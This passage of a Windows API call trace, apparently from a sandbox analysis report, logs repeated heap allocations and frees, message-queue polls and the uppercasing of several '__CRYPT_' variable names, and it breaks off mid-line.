1 [0152.086] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0152.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50710 [0152.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0152.086] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0152.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508c0 [0152.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0152.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0152.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0152.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0152.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0152.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0152.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0152.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.087] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0152.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0152.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0152.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0152.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0152.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0152.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0152.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0152.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0152.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0152.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0152.087] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0152.087] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0152.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0152.088] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0152.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0152.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0152.088] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0152.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0152.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0152.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0152.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0152.088] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0152.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0152.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0152.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0152.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0152.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0152.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.088] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0152.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0152.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.088] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0152.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0152.089] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0152.089] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0152.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0152.089] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0152.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0152.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0152.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0152.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0152.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0152.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0152.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0152.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.089] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0152.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0152.089] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0152.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0152.089] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0152.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0152.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0152.090] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54530 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540a8 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.090] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54300 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0152.091] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0152.092] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0152.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0152.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0152.092] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0152.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0152.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0152.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50440 [0152.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0152.092] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fd88 [0152.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0152.092] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0152.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fd88 | out: hHeap=0x970000) returned 1 [0152.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0152.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0152.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78c00 [0152.092] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0152.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0152.092] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0152.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0152.092] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0152.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0152.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0152.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0152.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0152.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0152.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0152.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505c0 [0152.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50680 [0152.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0152.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0152.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0152.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50530 [0152.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0152.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0152.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0152.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0152.093] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0152.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0152.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0152.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0152.093] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0152.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0152.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0152.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0152.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0152.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0152.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0152.094] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0152.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78c00 | out: hHeap=0x970000) returned 1 [0152.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0152.094] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0152.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0152.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0152.094] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0152.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0152.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0152.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50518 [0152.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0152.094] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0152.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0152.094] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0152.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0152.094] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0152.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0152.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0152.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0152.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0152.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a08 | out: hHeap=0x970000) returned 1 [0152.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0152.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0152.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0152.095] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0152.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0152.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0152.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0152.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0152.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0152.095] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0152.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0152.095] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0152.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50578 [0152.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0152.095] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.095] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0152.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0152.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0152.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0152.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0152.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0152.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0152.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0152.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0152.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0152.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0152.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0152.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0152.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0152.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0152.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0152.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0152.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0152.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0152.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0152.096] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0152.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0152.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0152.096] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0152.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0152.097] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0152.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0152.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0152.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0152.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0152.097] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0152.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0152.097] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0152.097] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0152.097] HeapFree (in: hHeap=0x970000, 